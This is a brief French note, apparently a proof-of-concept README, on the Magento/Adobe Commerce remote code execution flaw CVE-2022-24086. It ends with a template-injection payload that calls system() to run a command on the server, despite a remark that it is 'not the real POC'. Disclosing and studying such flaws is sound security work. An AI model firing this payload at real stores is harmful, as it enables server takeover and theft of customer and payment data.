
CVE-2022-24086 concernant Magento RCE
CVE-2022-24086 à propos de Magento RCE
Les versions Adobe Commerce 2.4.3-p1 (et antérieures) et 2.3.7-p2 (et antérieures) sont affectées par une vulnérabilité de validation d'entrée incorrecte lors du processus de paiement. L'exploitation de ce problème ne nécessite pas d'interaction de l'utilisateur et pourrait aboutir à l'exécution de code arbitraire.
Remarque : Ceci n'est pas le vrai POC ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}